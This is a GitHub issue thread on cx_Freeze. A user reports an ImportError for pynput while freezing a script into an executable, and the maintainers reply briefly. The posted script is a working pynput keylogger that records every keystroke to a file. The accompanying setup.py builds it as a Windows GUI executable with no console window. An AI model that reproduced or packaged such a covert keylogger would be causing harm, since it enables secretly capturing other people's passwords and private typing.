### ISSUE TITLE
ImportError: No module named 'pynput'

### ISSUE THREAD

**Issue by engenhariaeprogramacao** [marcelotduarte/cx_Freeze#374]
my keylogger.py file 
--------------------------------------------------------------------------------------------------
from pynput.keyboard import Key,Listener
import logging
def main():
	log_dir=""
	logging.basicConfig(filename=(log_dir+"key_log.txt"),level=logging.DEBUG,format='%(asctime)s: %(message)s')
	def on_press(key):
		logging.info(str(key))
	with Listener(on_press=on_press )     as listener:
		listener.join ()
main()		
--------------------------------------------------------------------------------------------------
my setup.py

import sys
from cx_Freeze import setup, Executable
from pynput.keyboard import Key,Listener

base = None
if sys.platform == "win32":
    base = "Win32GUI"
#print(sys.platform)

includefiles = []
includes = []
excludes = []
packages = ["pynput","loggging"]
filename = "keylogger.py"

setup(
    name = 'myapp',
    version = '0.1',
    description = '',
    author = '',
    author_email = '',
    options = {'build_exe': {'excludes':excludes,'packages':packages,'include_files':includefiles}},
    executables = [Executable(filename, base = base, icon = None)])
		
		# base= 'console'  abre o console dos
		# base= "Win32GUI" janela de interfacewindons
		
------------------------------------------------------------------------------------		
after do python setup.py build_exe

running build_exe
Traceback (most recent call last):
  File "setup.py", line 26, in <module>
    executables = [Executable(filename, base = base, icon = None)])
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\dist.py", line 349, in setup
    distutils.core.setup(**attrs)
  File "D:\Python\Python36\lib\distutils\core.py", line 148, in setup
    dist.run_commands()
  File "D:\Python\Python36\lib\distutils\dist.py", line 955, in run_commands
    self.run_command(cmd)
  File "D:\Python\Python36\lib\distutils\dist.py", line 974, in run_command
    cmd_obj.run()
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\dist.py", line 219, in run
    freezer.Freeze()
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\freezer.py", line 616, in Freeze
    self.finder = self._GetModuleFinder()
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\freezer.py", line 342, in _GetModuleFinder
    finder.IncludePackage(name)
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\finder.py", line 659, in IncludePackage
    module = self._ImportModule(name, deferredImports)
  File "D:\Python\Python36\lib\site-packages\cx_Freeze\finder.py", line 351, in _ImportModule
    raise ImportError("No module named %r" % name)
ImportError: No module named 'pynput'

Someone know how to fix this?! I

**Comment by 100PercentNotAMobster** [comment]
Did you pip install it?

**Comment by marcelotduarte** [comment]
cx_Freeze 6.1 has just been released.
Assuming this has been resolved.
If you had issues please re-open.
